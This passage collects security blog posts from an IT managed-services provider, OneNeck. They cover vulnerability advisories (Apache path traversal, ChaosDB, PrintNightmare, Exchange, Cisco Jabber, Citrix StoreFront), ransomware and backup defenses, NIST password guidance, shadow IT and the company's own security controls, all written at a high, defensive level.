  in Microsoft 365, as well as the guidance on deploying and configuring conditional access policies in Azure Active Directory (Azure AD).

3. Review and audit logs and configurations.

• Review and audit Azure AD sign-ins and configuration changes: Authentications of this nature are audited and available to customers through the Azure AD sign in logs, Azure AD audit logs, and the Microsoft 365 compliance center (formerly in the Exchange Admin Center). We recently added the capability to see sign-ins by partners who have delegated admin permissions. You can see a filtered view of these sign-ins by navigating to the sign-in logs in the Azure AD admin portal, and adding a filter ‘Cross-tenant access type: Service provider’ on the ‘User-sign ins (non-interactive)’ tab.
• Review Existing Log Availability and Retention Strategies: Investigating activities conducted by malicious actors places a large emphasis on having adequate log retention procedures for cloud-based resources including Office 365. Various subscription levels have individualized log availability and retention policies which are important to understand prior to forming an incident response procedure.

What does OneNeck do to keep our customers safe?

As noted in Microsoft’s statement, MSPs like OneNeck are primary targets of this type of cyberattack. To ensure we have appropriate protections, detections and response, we leverage the Center for Internet Security’s (CIS) Critical Security Controls which are a series of cybersecurity actions prioritized by their criticality in preventing cyberattacks. OneNeck completes a CIS Critical Security Control’s assessment annually, along with incorporating the controls as part of any new service.

While we assess against all the controls, we also adhere to other top priority controls:

• Inventory and control of hardware and software assets:Our ReliaCloud environment is maintained in secure data centers that meets or exceeds all physical and environmental controls (per our ISO/IEC 27001:2013 certification.) We complete regular scans of our environment to assure only known devices are within the environment, and we maintain a CMDB (Configuration Management Database), per ITIL good practices, for all managed devices and software.
• Vulnerability management:OneNeck continuously acquires, assesses and takes action on new information in order to identify vulnerabilities, remediate and minimize the window of opportunity for attackers. Activities include:
  • Identifying vulnerabilities through vendor notifications, industry leading security research organizations and OneNeck’s own security testing program.
  • Completing regular authenticated scanning and determining the appropriate risk rating for the vulnerability type, the system’s usage and the impacted system’s architecture.
  • Closed loop activities are completed through automated software which ensures that operating systems are running the most recent security updates provided by the vendors.
• Controlled use of administrative privileges:OneNeck uses non-default and unique passwords for all assets within ReliaCloud. Privileged accounts are managed in a secure password management system. Additionally, OneNeck leverages a remote access system that requires multi-factor authentication and tracks all privileged access and activities.
• Secure configurations:OneNeck maintains security configuration standards for all authorized operating systems and software. We store all master images and templates on securely configured servers and assure that only authorized changes are made to the images.
• Monitoring and analysis of audit logs:OneNeck has local logging on all critical infrastructure, and ensures all appropriate logs are aggregated to a central log management system for analysis and review. OneNeck’s Security Operations Center (SOC) leverages our Security Information and Event Management (SIEM) platform which provides correlation and analysis of all presented logs. Additionally, our SOC monitors and is alerted on critical situations 24×7 to assure the security of all OneNeck environments, in particular ReliaCloud.

As identified in the CIS Controls, we annually use third-party penetration (pen) testers to ensure the controls put in place are effective. A recent pen test revealed OneNeck has “Strong External Network Security Controls” in place and that our systems and services are well-patched and maintained.

Additionally, we stay informed through various mechanisms (vendors, industry, governments, dark web monitoring, etc.) to ensure we are aware of any emerging threats, in particular against MSPs. In a recent release by the FBI, they identified most of the attacks involved compromised credentials, and from there pivoting between MSP and customer shared networks. The most common attack vectors include spear phishing, malicious web content and credential theft. We have multiple controls in place for email including requiring MFA, blocking phishing emails, alerting for risky sign-ins and impossible travel alerts, along with regular end user training and testing. Additionally, there is a whole series of controls we focus on as an MSP which include:

• Ensure MSP accounts are not assigned to administrator groups.
• Restrict MSP accounts to only the systems they manage.
• Ensure MSP account passwords adhere to organizational policies.
• Use a dedicated Virtual Private Network (VPN) for MSP connection.
• Restrict VPN traffic to and from MSP.
• Ensure internet-facing networks reside on separate physical systems.
• Separate internal networks by function, location, and risk profile.
• Use firewalls to protect server(s) and designated high-risk networks.
• Ensure internal and external Domain Name System (DNS) queries are performed by dedicated servers.
• Disable or block all network services that are not required at network boundary.

Along with all the controls we manage/review above, our annual attestations for SOC1 Type II, SOC2 Type II, and HIPAA, further validate our commitment to a secure environment.

We understand that maintaining a strong risk profile is daunting as the threat landscape continues to grow. But as your partner, we are here to help. Don’t go it alone. Talk to one of our experienced security specialists today.

Two days ago, The Apache Foundation disclosed a path traversal and file disclosure flaw in Apache HTTP Server 2.4.49 (an open-source web server for Unix and Windows that is among the most widely used web servers), tracked as CVE-2021-41773, as actively being exploited in the wild. The advisory does not indicate when exploitation of CVE-2021-41773 was detected, but the exploitation drove the expedited release of a patch by Apache.

This is a threat because a bad actor could exploit this vulnerability and gain access to database credentials through the web server, leading to leaked sensitive content, like source code, passwords, configuration files and other confidential information.

These issues only impact Apache HTTP Server 2.2.49, and a patch is now available. It is important that anyone running Apache HTTP Server 2.4.49 update immediately.

If you’re interested in learning more or are impacted by this vulnerability, our security experts are here to help. We’ve got your back!

On August 26, Internet security firm, Wiz, announced it had found a security flaw in Microsoft Azure Cosmos DB, a global multi-model NoSQL store used by thousands of enterprises around the world.

The exploit, named “ChaosDB,” allows bad actors to access the primary keys to a Cosmos DB account. The exploit was found in the recently added Jupyter Notebook feature of Cosmos DB.

In response to this threat, Microsoft immediately disabled this feature for a full security audit.

Our Recommendation

OneNeck recommends everyone who has implemented a Cosmos DB account immediately regenerate the primary and secondary access keys. This will ensure continued data privacy.  While Microsoft doesn’t believe any customer data has been leaked, but your keys should immediately be regenerated to be safe.

If you have any questions regarding this vulnerability, we are here to help. Don’t hesitate to reach out.

Keep Moving Forward. We Have Your Back.

The PrintNightmare Zero Day vulnerability allows attackers with a local presence on a device to execute malicious code that exploits the flaw in the Windows Print Spooler service, granting SYSTEM access. Specifically, an attacker can exploit the vulnerability by placing the exploit DLL in a subdirectory under “C:WindowsSystem32spooldrivers”. Microsoft notification for this vulnerability can be found here:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

Windows operating systems that run the Windows Print Spooler service by default can be exploited via local access to the endpoint. This vulnerability has been classified with a local attack vector, which means that an attacker would theoretically need to have had authenticated to the device running the exploitable Windows Print Spooler service. Per Microsoft’s recommendation customer should prioritize assessing the need for print spooling on domain controllers.

The recommended mitigations to this known vulnerability include the following:

• Stop and disable the Windows Print Spooler service on machines that do not require it
• For the systems that require the Windows Print Spooler service to be running, enable the PrintService-Operational event logging
• For the systems that do require the Windows Print Spooler service to be running ensure they are not exposed to the internet.

This is an evolving situation and we will continue to provide updates as they become available.

If you have questions, your OneNeck team is here to help. OneNeck customers, please contact the OneNeck Service Desk at 800-272-3077.

No doubt about it — if your company has employees, you have shadow IT. According to a survey conducted by Stratecast and Frost & Sullivan, 80% of employees say they use applications on the job that aren’t approved by IT.

Shadow IT brings up security, integration and operational challenges and companies have three paths to choose from when it comes to dealing with it — they can accept it, try to suppress it or ignore it. The latter option may be the path of least resistance but can put the organization at tremendous risk. Ignoring shadow IT can threaten enterprise systems and data, and a security-conscious enterprise must have a plan for effectively dealing with it.

What Is Shadow IT?

Shadow IT is an umbrella term referring to any technology, be it an application or device (smartphone, tablet, laptops, etc.), deployed within an organization without the approval from the IT department. IT departments are often unaware that applications are being used by either individual employees or entire line of business units.

Most employees who adopt unsanctioned solutions do so with good intentions, not to undermine security, but to more effectively do their job. With the plethora of business and productivity applications available and the ease of installing these applications, shadow IT continues to propagate. Oftentimes, the process of seeking official IT approval for new applications is onerous and long, so employees take matters into their own hands. The cloud and mobile are large contributors to the problem.

Common examples of shadow IT include:

• Productivity apps (Trello, Slack, Asana )
• Messaging apps on corporate-owned devices (Snapchat, WhatsApp)
• Physical devices (flash drives, external drives)
• Cloud storage (Dropbox, Google Drive)
• Communication apps (Skype, VOIP)

Shadow IT Risks

According to Cisco, 80% of end users use software not cleared by IT, 83% of IT staff admit to using unsanctioned software or services, and only 8% of all enterprises actually know the scope of shadow IT within their organization!

Shadow IT, without a doubt, adds risk into your organization, and your employees are your weak link. Michael Bruemmer, vice president of Experian Data Breach Resolution explained, “As we have seen in our incident response service that we do for clients, about 80% of all the breaches we service have a root cause in some type of employee negligence.” When non-sanctioned applications and devices are in use, vulnerabilities can be introduced into the infrastructure, and without IT oversight, the root-cause is very difficult to find.  Some examples of risk includes:

1. Software Asset Management (SAM): Organizations need to track all software applications used and licensing information. Unauthorized software makes this already difficult task nearly impossible, leading to our next risk.
2. Compliance: Unauthorized applications once discovered can mandate a complete audit of the infrastructure to ensure you are compliant. Organizations who do not take this seriously risk hefty fines from non-compliance.
3. Testing: IT infrastructures are complex organisms that require management. Introducing new applications without proper testing can compromise the entire infrastructure. Shadow IT also adds more complexity to the entire testing process by having to involve a third party.
4. Configuration management: Creating a configuration management database (CMDB) and defining relationships between different systems is labor-intensive. When other employees use shadow IT, those systems are not included and can have compatibility issues as a result.

How Do You Control Shadow IT?

Organizations must place a high value on reigning in shadow IT and work closely with lines of business to mitigate their risk. Suggestions include:

• Continuously monitor the network for applications and systems.
• Conduct an audit, and ask your employees to come forward, promising that they will not face consequences for using shadow IT applications.
• Create a system for ranking and prioritizing risk. Not all applications outside of IT control are equally threatening.
• Develop a list of devices approved for BYOD use, and make sure employees know that “jailbroken” devices are prohibited.
• Develop an internal app store for all applications that have been evaluated and approved for use within the corporate infrastructure.
• Block applications that are deemed dangerous and require users to seek approval before downloading.

In the long run, CIOs need to develop comprehensive procedures for approving cloud applications that are fast and efficient so that employees will not need to go around the system in a rogue manner. When employees are given a choice on what devices and applications they can use, it improves productivity, drives innovation and increases morale. So, embrace shadow IT in a way that manages risk and keeps your organization safe and compliant. Explore our cloud solutions or contact us for support in dealing with shadow it security risks.

As pretty much everyone knows by now, Colonial Pipeline, one of the US’ largest pipelines carrying 2.5 million barrels per day (45% of the East Coast’s diesel, gas and jet fuel supply) and spanning from Texas to New Jersey, was forced to proactively shut down on Friday, May 7, due to a cyber attack.

The FBI issued a statement confirming that DarkSide, a well-known cyber-criminal gang, was responsible for the attack. The BBC states that many cyber-security researchers have speculated that the cyber-criminal gang could be Russian, as their software avoids encrypting any computer systems where the language is set as Russian.

It’s a storyline that’s become all too familiar, where ransomware is to blame for cutting a business off at the knees, leaving casualties in its wake far and wide. And while it can be overwhelming trying to combat these onslaughts of attack, it’s a good reminder to stop and assess your current security hygiene…

Are you doing what you can to keep your organization safe?

To effectively protect against cyber threats, you need solutions that:

• Stop threats at the edge.
• Control who gets on your network.
• Simplify network segmentation.
• Protect users wherever they are.
• Find and contain problems fast.

But where does one even start? At OneNeck, our security experts believe that a solid place to start with any security strategy is with established security frameworks, such as the CIS Critical Security Controls.

These Controls represent the collective thinking of IT experts across multiple industries and can be used as a guide to assess for good cyber hygiene and provide a prioritized set of actions to be used to addresses security vulnerabilities. These practical actions, which combine technical security and risk management, can help mitigate the most common attacks against systems and networks and reduce corporate risk. Collectively, they can help you take a defense-in-depth approach to building your security program.

So, don’t wait until it’s too late to address the security gaps that can be exploited by bad actors. As OneNeck CISO, Katie McCullough, says… “To avoid becoming a ransomware victim, businesses should take actions that include putting security processes in place to ensure your IT environment is fully protected. It can be a journey, but you don’t have to go it alone.”

If you’re interested in talking with one of our security experts, we’re here to help.

Learn more from OneNeck’s CISO about the Anatomy of Ransomware in this informative blog.

Over the last couple of days, Microsoft released out-of-band security updates to address multiple vulnerabilities in Microsoft Exchange that could allow an unauthenticated, remote attacker to exploit an Exchange Server by sending a specially crafted HTTP request over port 443 allowing the attacker to authenticate.

These are the recommended security updates:

• Update KB5000871 has been released for the latest release of the latest three versions of Microsoft Exchange (2013-2019) and the previous release for currently supported versions (2016, 2019).
• Update KB5000978 has been released for the latest release of Microsoft Exchange 2010.

At OneNeck, we take these threats very seriously and are actively creating patching baselines, working on plans and scheduling to apply these vulnerability patches with customers that have Managed Exchange Services with OneNeck.

Additional Information From Microsoft:

Mitigations (From Microsoft CVE)


The initial attack requires the ability to make an untrusted connection to Exchange server port 443. This can be protected against by restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access. Using this mitigation will only protect against the initial portion of the attack. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file.
We recommend prioritizing installing updates on Exchange Servers that are externally facing.

FAQ (From Microsoft CVE)

Q: Is this vulnerability being used in an active attack?



A:

Yes. The vulnerability described in this CVE is one of four vulnerabilities that are being exploited in an active attack. The security updates address this attack.

Q: What is the target for this attack?



A:

The initial attack in this attack chain targets an Exchange On-prem server that is able to receive untrusted connections from an external source. In addition, the Exchange server would need to be running Microsoft Exchange Server 2013, 2016, or 2019.

Source Links:

• Security update for Microsoft Exchange Server 2019, 2016, and 2013: March 2, 2021 (KB5000871)
• Security update for Microsoft Exchange Server 2010
• Microsoft Security Blog
• Microsoft CVE
• Mitre CVE

If you have any questions or concerns that you’d like to discuss with a OneNeck security expert, we’re here to help.

Data breaches are everywhere, and everyone is susceptible – even the security experts. This was recently put front and center by the state-sponsored adversary that stole FireEye’s Red Team tools.

This particular breach was especially eye-opening, as FireEye is not only a well-recognized security company, but the stolen data includes the custom penetration tools utilized by FireEye’s Red Team, a group of security professionals that specialize in cracking the code on attackers.

As a result of the breach, FireEye provided extensive information and countermeasures for security professionals to implement in defense of the stolen tools.

This type of breach is sure to make any security professional wince. But if you’re a tech leader at a mid-market organization with limited budget and minimal-to-no in-house security expertise, you have to wonder if you even have a chance against the bad guys. We’re here to tell you that you do.

While there are a plethora of tools on the market, an important security control is protecting your network boundary with a next generation firewall. Many organizations are still using outdated firewalls that are less efficient, less effective and vulnerable to attack – and often not integrated into the rest of the security point-products. You need a modern firewall that can block threats and quickly mitigate those that do breach your perimeter.

As a Cisco partner, we’ve seen firsthand the power of Cisco’s integrated system of security tools, with the next-generation firewall (Firepower) at its core. These tools work together to prevent breaches, automate operations, save you time and uncover and eliminate threats everywhere, fast.  FirePower includes an advance threat team (Talos, one of the largest commercial threat intelligence teams) at the ready 24×7 to ensure Cisco’s security tools are optimized to recognize and address advanced threats as they happen.

And as an added bonus, OneNeck can help you further by managing your next-gen firewall 24×7, so that we’re here on that wall, keeping watch, ensuring all advanced threat features are updated immediately and enabling your team to focus on other tasks outside of watching for attackers. It may seem overwhelming when even the big guys get breached, but you’re not alone. Let’s work together to keep the bad guys out!

Specific to the FireEye breach which identified a widespread compromise of Solarwinds software, OneNeck continues to ensure we are following security industry and vendor recommendations for securing our environment specific to any of the 
Common Vulnerabilities and Exposures (CVE)
 and any Indicators of Compromise’s (IoC) that become known to be associated with these breaches.  The
CVEs
 specifically associated with these breaches have documented solutions from the appropriate vendors that have been made available. Therefore through our standard process, such as normal patching, OneNeck devices have the appropriate protections.  While OneNeck does not leverage the SolarWinds Orion IT monitoring and management software to provide any of our services, we have and continue to:

• Consume signatures and Indicators of Compromise (IOC) related to the Solarwinds and FireEye compromise into our monitoring and security platforms.
• Contact our suppliers and vendors to review any use of Solarwinds, and to identify and mitigate any potential risk to OneNeck data or services.

Additionally, to continuously ensure our environment has the appropriate security protections, detections and response, OneNeck leverages the
Center for Internet Security’s
 (CIS) Critical Security Controls, which are a series of cybersecurity actions prioritized by their criticality in preventing cyberattacks. OneNeck completes a CIS Critical Security Control’s assessment at least annually, along with incorporating the controls as part of any new service.

For customer-specific environments where OneNeck provides managed services, OneNeck is monitoring for any additional updates from specific technology vendors to address potential threats.  As updates are identified, OneNeck will follow appropriate communication and change protocols to get approval from customers to implement.  As noted previously, where customers leverage our recommended patching process, the specific protections related to patches recommended by CVE’s would already be in place.  Where OneNeck provides additional security services such as Endpoint Detection and Response (via Cisco AMP for Endpoints), Next Generation Firewall (via Cisco Firepower) or Managed Detection and Response (via Alert Logic), we continue to work with these key vendors to implement additional monitoring and protections associated they provide with protecting against new threats associated with the FireEye or Solarwind breach.

“What’s in a name? That which we call a rose by any other name would smell as sweet.” True, Juliet, but a name does matter, especially when it’s simply arbitrary versus describing what it actually is. And this seems to be a truth that Microsoft has taken to heart…

After rebranding Windows Defender as Microsoft Defender in early 2019, Microsoft announced in September that they are renaming and bringing more products under the Defender brand.

The Defender product line is now larger and split into two buckets:

• Microsoft 365 Defender for end user environments: Microsoft 365 Defender delivers XDR (Extended Detection and Response) capabilities for identities, endpoints, cloud apps, email and documents. It uses artificial intelligence to reduce the SOC’s work items, and in a recent test we consolidated 1,000 alerts to just 40 high-priority incidents. Built-in self-healing technology fully automates remediation more than 70% of the time, ensuring defenders can focus on other tasks that better leverage their knowledge and expertise.
• Azure Defender for cloud and hybrid infrastructure: Azure Defender delivers XDR capabilities to protect multi-cloud and hybrid workloads, including virtual machines, databases, containers, IoT, and more. Azure Defender is an evolution of the Azure Security Center threat protection capabilities and is accessed from within Azure Security Center.

The Microsoft 365 Defender line now includes:

• Microsoft 365 Defender (previously Microsoft Threat Protection)
• Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection)
• Microsoft Defender for Office 365 (previously Office 365 Advanced Threat Protection)
• Microsoft Defender for Identity (previously Azure Advanced Threat Protection)

The Azure Defender line now includes:

• Azure Defender for Servers (previously Azure Security Center Standard Edition)
• Azure Defender for IoT (previously Azure Security Center for IoT)
• Azure Defender for SQL (previously Advanced Threat Protection for SQL)

This rebranding of Microsoft’s security offerings is in alignment with other product renaming initiatives (such as the renaming of the Office 365 SMB SKUs) that have taken place over the last year or so.

OneNeck Product Director, Jim Brown, states, “It just makes sense. As Microsoft is striving to simplify and unify their security offerings to cover an end-to-end security portfolio, the names need to reflect this strategy and enable clear consumption models and make it easier for organizations to understand how to use them to be more secure.”

We’ve Got Your Back.

As an experienced Cloud Solution Provider (CSP) and Microsoft partner, we’re here to help. So, if you have any questions regarding the new Microsoft product names and how to use them to secure your data and applications, let’s chat.

On September 2nd, 2020, Cisco issued a Critical Security Advisory announcement regarding Cisco’s Jabber for Windows that customers should be aware of. A vulnerability in Cisco Jabber for Windows could allow an authenticated, remote attackers to execute arbitrary code. Attackers could achieve remote code execution by sending specially crafted chat messages.

To exploit this vulnerability, an attacker must be able to send XMPP messages to end-user systems running Cisco Jabber for Windows. Attackers may require access to the same XMPP domain or an-other method of access to be able to send messages to clients.

The issue has the follow advisory code: CVE-2020-3495

The vulnerabilities affect all currently supported versions of the Cisco Jabber client for Windows (12.1 – 12.9). Systems using Cisco Jabber in phone-only mode (without XMPP messaging services enabled) are not vulnerable to exploitation. There are no workarounds that address this vulnerability.

What Should You Do if Your Version of Jabber is Impacted?

Any customers running an affected version of Jabber, should upgrade as soon as possible. See the fixes in the table below:

• Users operating version 12.1 should upgrade to 12.1.3
• Users operating version 12.5 should upgrade to 12.5.2
• Users operating version 12.6 should upgrade to 12.6.3
• Users operating version 12.7 should upgrade to 12.7.2
• Users operating version 12.8 should upgrade to 12.8.3
• Users operating version 12.9 should upgrade to 12.9.1

The latest versions can be downloaded from the following URL:

https://software.cisco.com/download/home/284324806/type/284006014/release/

If this vulnerability applies to you, it’s time to update. If you have any questions or would like to talk to a OneNeck expert about Cisco Jabber, we are here to help…

Keep Moving Forward. We Got Your Back.

On September 14, Citrix pushed out an announcement around a high-severity security vulnerability Citrix StoreFront customers should be aware of. An issue has been discovered in Citrix StoreFront (before 2006) that, if exploited, would allow an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server.

This issue has the following identifier: CVE-2020-8200.

The issue affects the following supported Long Term Service Release (LTSR) versions of Citrix StoreFront:

• Citrix StoreFront 1912 LTSR before CU1 (1912.0.1000)
• Citrix StoreFront 3.12 for 7.15 LTSR before CU5 Hotfix (3.12.5001)
• Citrix StoreFront 3.0 for 7.6 LTSR before CU8 Hotfix (3.0.8001)

Citrix StoreFront is included in deployments of Citrix Virtual Apps and Citrix Virtual Apps and Desktops as an infrastructure component, if you have Citrix Virtual Apps or Citrix Virtual Apps and Desktops then you have Citrix StoreFront deployed in your environment today. Also, customers running Citrix Virtual Apps and Desktops 2003 should be aware that the version of Citrix StoreFront included in that release, 1912 LTSR, is one of the affected versions.

If users are not in the same Microsoft Active Directory domain as the Citrix StoreFront server, the vulnerability is not exploitable, even if the users are authenticated in a transitively trusted domain. Note that this applies even if the user is logged into the Citrix StoreFront server.

What Should You Do if Your Version of Citrix StoreFront is Impacted?

Citrix has addressed this issue in the following Citrix StoreFront versions:

• Citrix StoreFront 1912 CU1 (1912.0.1000) and later versions of Citrix StoreFront 1912 LTSR
• Citrix StoreFront 3.0 for 7.6 LTSR CU8 Hotfix (3.0.8001) and later versions of StoreFront 3.0 for 7.6 LTSR
• Citrix StoreFront 3.12 for 7.15 LTSR CU5 Hotfix (3.12.5001) and later versions of StoreFront 3.12 for 7.15 LTSR

Any customers running an affected version of Citrix StoreFront, both CR and LTSR versions, should upgrade as soon as possible.

The latest versions of Citrix StoreFront can be downloaded from the following URLs:

• https://www.citrix.com/downloads/storefront/ 
• https://support.citrix.com/article/CTX277537 
• https://support.citrix.com/article/CTX277538

Earlier this year, another Citrix vulnerability resulted in numerous compromised systems and hours of remediation work for organizations that were slow to fix it. Don’t let this happen to you. If this vulnerability applies to you, it’s time to update. If you have any questions or would like to talk to a OneNeck expert about your Citrix StoreFront, we are here to help.

Ransomware is at our doorstep. We cannot ignore it any longer or think we are not a target. In recent years at OneNeck, we have seen a significant upward trend of ransomware attacks. And even more troubling is in the last year, we have seen bad actors getting smarter, and they are now targeting your backup server and backup data to prevent you from recovering from the attack. As ZDNet stated, “The number of ransomware strains targeting NAS and backup storage devices is growing, with users ‘unprepared’ for the threat.”

In response, the backup industry has replied with some key recommendations you can implement to make it more difficult for those bad actors to be successful. Below are some of the recommendations being made by the industry and what we at OneNeck have seen be successful in slowing and reducing the risk of ransomware infecting your backup infrastructure:

1. Remove your backup servers from the domain.

The goal of this recommendation is to prevent a compromised domain account with privileged access from leap frogging from server to server until they gain full management access of your backup infrastructure. This is a great first step and depending on your backup infrastructure, it could be sufficient to keep those bad actors from gaining access to that data.

2. Implement multi-factor authentication (MFA) on your backup servers.

Preventing the bad actors from accessing your backup management software is the goal of this recommendation. Removing all other management consoles from admin desktops and using a dedicated backup management server with multi-factor authentication makes it more difficult for bad actors to gain access to your backup infrastructure.

3. Create an isolated network and control who can access it.

If your backup servers and repositories are on the same network as your production servers and data, it is not difficult for the bad actors to jump from a compromised server and reach your backup infrastructure via the network. By creating a separate network, it makes it easier to create access control lists and prevent certain types of traffic from reaching your backup infrastructure. You can also lock down which devices have access to that separated network as well, making it more difficult for the bad actors to gain access and wreak havoc.

4. Send a third copy of your backup data into object storage.

Object storage changes the way the data is written and can be rewritten in your backup repositories. By the nature of ransomware, it wants to read and overwrite or append to the original file to encrypt it. Object storage by design only allows create and delete operations thus making it more difficult for ransomware to encrypt an object store.

5. Implement an air-gapped backup repository.

This is the panacea to help keep your backup environment protected but does require the most cost and complexity. The goal of an air-gapped backup repository is to keep the backup copy and infrastructure offline from the production network, it is only online for a short period to pull the latest data copy and scan it for ransomware. It takes physical access to manage the air-gapped backup equipment which is extremely difficult for those bad actors.

To learn more about air-gapped backups, watch this webinar.

OneNeck would be happy to open the conversation to discuss how these preventative measures can be implemented in your environment to better protect your backup infrastructure. OneNeck can also help with an offensive approach to ransomware and business continuity. Backups always provide a good defense, but any good game plan has both an offensive and defensive component.

Keep Moving Forward. We Got Your Back(up).

We’ve all heard of the dark web, but most law-abiding people don’t give it much thought, as we chalk it up to the place shady people go to do shady things. But the truth is that today’s data-driven organizations can no longer ignore the dark web and the possibility that their customer and employee data could be out there with a for-sale sign.

As OneNeck security expert, Kevin Holestine, recently put it, “If someone wanted to buy your compromised customer or employee data, then the dark web is where they’d go. Which is what makes dark web scans a good practice for identifying if your data or accounts have been breached, for whatever reason, without your security tools alerting you.”

Compromised credentials are a hot-ticket item on the dark web, and in malicious hands, can bring devastating consequences to an organization. By adding a dark web scan to the detection toolkit, as well as stringent password policies, it’s possible to stop attacks before they happen.

As a secure managed services provider, we know that security best practices are key to ensure we don’t miss anything, one being the password guidance on digital identity set out by the National Institute of Standards and Technology (NIST). NIST is a non-regulatory federal agency that operates under the Department of Commerce, and they develop information security standards and guidelines that establish the minimum requirements for federal systems – a great set of guidelines for non-government organizations as well. And in an effort to continuously evolve as security strategies evolve, the NIST password guidelines were recently updated to be more user friendly, and by user friendly we mean less complex, easier to remember, but harder to guess.

So, what are the new NIST guidelines for passwords?

• Passwords must contain a minimum of 8 and allow at least 64 characters in length to support the use of passphrases.
• Do not impose other composition rules such as requiring special characters, upper- and lower-case characters, and at least one number, but allow their use.
• When establishing or changing passwords, compare prospective passwords against a list of banned passwords that includes:
• Passwords with sequential and repetitive characters (e.g. 12345 or aaaaaa).
• Context-specific passwords (e.g. the name of the site, etc.).
• Commonly used passwords (e.g. p@ssw0rd, etc.) and dictionary words.
• Passwords obtained from previous breach corpuses.
• No longer require periodic password changes, but force a password change if there is evidence of a compromise.

When it comes to credentials on the dark web, Kevin specifically refers to the last NIST guideline above – force a password change if there is evidence of a compromise. 

“Credentials from previous breach corpuses are obtained from the dark web and end up on banned password lists, which ostensibly triggers a password change request as per the NIST guidance. But the window of time that exists between a breach and the emergence of stolen credentials is not insignificant, nor are security tools in place to protect from and detect breaches guaranteed to be 100% effective 100% of the time. This is why dark web monitoring can be a very useful tool for security teams in that it serves as a form of out-of-band breach detection by alerting you when conventional tools may have failed or when a breach occurs via a vector out of your control, such as the compromise of an employee’s personal credentials that lead to the compromise or their corporate credentials.” 

In addition to following best practices for password security, a great place to start to ensure your credentials are safe is with a dark web scan. If you’re interested in a dark web scan, we are here to help. Find out if your information is out there before it ends up in the wrong hands.

Ransomware is a type of malware that threat actors use to infect computers and encrypt computer files until a ransom is paid. After the initial infection, ransomware will attempt to spread to as many connected systems as possible, including  file systems and other accessible systems on a business’s network.

To avoid becoming a Ransomware victim, businesses should take actions that include putting security processes in place to ensure your IT environment is fully protected. Leveraging the Center for Internet Security’s (CIS) Critical Security Controls (CSC) is a solid place to start. These same security processes will help protect your critical business environment from malware, which accounts for nearly 30% of all breaches, according to Verizon’s 2019 Data Breach Investigations Report. In addition, the evaluation portion of the CSC is included with OneNeck’s virtual CISO (vCISO) service.

Mitigating contact with malicious web sites and emails.

Typically, the initiating step of a security breach is attributed to end users, where they have visited a malicious web site or acted unknowingly on a malicious email. There are several key security processes that can mitigate this initiating event:

• Implement a Security Awareness and Training Program (CSC Control #17). This includes training the workforce on how to identify different forms of social engineering attacks (e.g., phishing, phone scams and impersonation calls). Educate your workforce to:
  • Use caution with links and when entering website addresses.
  • Check a website’s security (look for the lock) to ensure the information you submit is encrypted before you provide it.
  • Know email senders.
  • Open email attachments with caution.
• Continuous Vulnerability Management (CSC Control #3). Deploy automated software update tools in order to ensure the operating systems are running the most recent security updates provided by the software vendor. Typically the malware—and therefore attackers—are going to leverage a known vulnerability in an operating system to gain access or take control of a system.
• Malware Defenses (CSC Control #8). End point protection needs to be implemented on all workstations and servers. Advanced Threat Protection can detect, stop the movement of, or control the execution of malicious software. Additionally, it is best to be centrally managed to ensure:
  • End point software is at current versions.
  • It is scanning appropriately.
  • A notification process is in place for when the Advanced Threat Protection detects and takes action.
  • Quarantined files are handled properly.

If malware takes hold, defenses that can help.

If the malware is successful in taking hold in your IT environment, there are several defenses that can help prevent the malware from evolving into a full-scale ransomware event:

• Boundary Defense (CSC Control #12). The primary device involved is your firewall; however, critical to the firewall are features available (IDS/IPS), the architecture (configure DMZs, segmentation), the configuration you’ve implemented (put in filters for outbound traffic), and regularly scan your firewall to assure you’re only allowing what you want. When malware is installed it typically wants to talk to a bad actor outside your network; therefore, if your firewall is configured properly, it can prevent malware from being able to connect back to the bad actor.
• Controlled Use of Administrative Privileges (CSC Control #4). Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges. One of the primary goals of malware is to gain full access to your environment, and the best way to do that is for the bad actor to compromise a privileged account, such as Domain Admin.
• Monitoring/Logging (CSC Control #6). Ensure appropriate logs are being aggregated to a central log management system for analysis and that they are being reviewed. Poor or nonexistent log analysis processes can allow attackers to control victim machines for months or years without anyone in the target organization knowing, even though the evidence of the attack is being recorded—in unexamined log files.

If the worst happens—and you are prepared—you still do NOT have to pay the ransom.

If the bad actor has taken hold, it’s not good—but all is NOT lost. While it’s likely the bad actor has gained access to a privileged account in the environment and your critical data is at risk, at this point, you can still minimize the impact.

• Incident Response and Management (CSC Control #19). Quickly discovering an attack and then effectively containing the damage, eradicating the attacker’s presence and restoring the integrity of the network and systems. This is a critical step—ensuring you inspect your entire environment for any movement the bad actors might have made. Otherwise, if you just move to recovering your environment, the bad actor will return quickly.
• Data Recovery Capabilities (CSC Control #10). Ensure each of the organization’s key systems are backed up as a complete system to enable the quick recovery of an entire system. The challenge with ransomware is that if the initiating event took place weeks/months earlier, your backup data may already be suspect. This is precisely why, when implementing your backup systems, you have to ensure all backups have at least one backup destination that is not continuously addressable through operating system calls, so that the ransomware can’t directly encrypt files.

Typically, there are several events that happen over the course of days, weeks or months that ultimately result in a ransomware attack. While there are a wide number of variants for ransomware, most events follow the path laid out above. Every step in the process could be identified and addressed. It can be a long journey, but you don’t have to go it alone. Through partnership with OneNeck’s vCISO service, the CSC will be leveraged to help assure your IT environment is protected.

Recent months have seen a massive shift towards supporting remote workers, which in turn has created a series of security challenges. IT teams are now not only tasked with quickly providing support for a never-before-seen number of offsite workers and their devices, but they must do it without compromising security – no small task.

Secure Your Remote Workers with OneNeck + Cisco

Taking into account this new reality, you need a straight-forward way to secure remote workers at the speed and the scale of your business. The Cisco Secure Remote Worker solution unifies user and device protection at scale, making it easy to verify, enable secure access and defend remote workers at anytime from anywhere. This integrated solution helps accelerate your business success with security that works together, delivering the power of Cisco Duo, AnyConnect, Umbrella and AMP for Endpoints.

• Cisco Duo verifies the identity of all users before granting access to corporate applications.
• Cisco AnyConnect enables secure access to the enterprise network for any user, from any device, at any time, in any location.
• Cisco Umbrella provides the first line of defense against threats on the Internet wherever users go.
• Cisco AMP for Endpoints provides the last line of defense, enabling protection, detection and response on the endpoint against known and unknown threats.

Just how do all of these pieces work together? Check out this quick video.

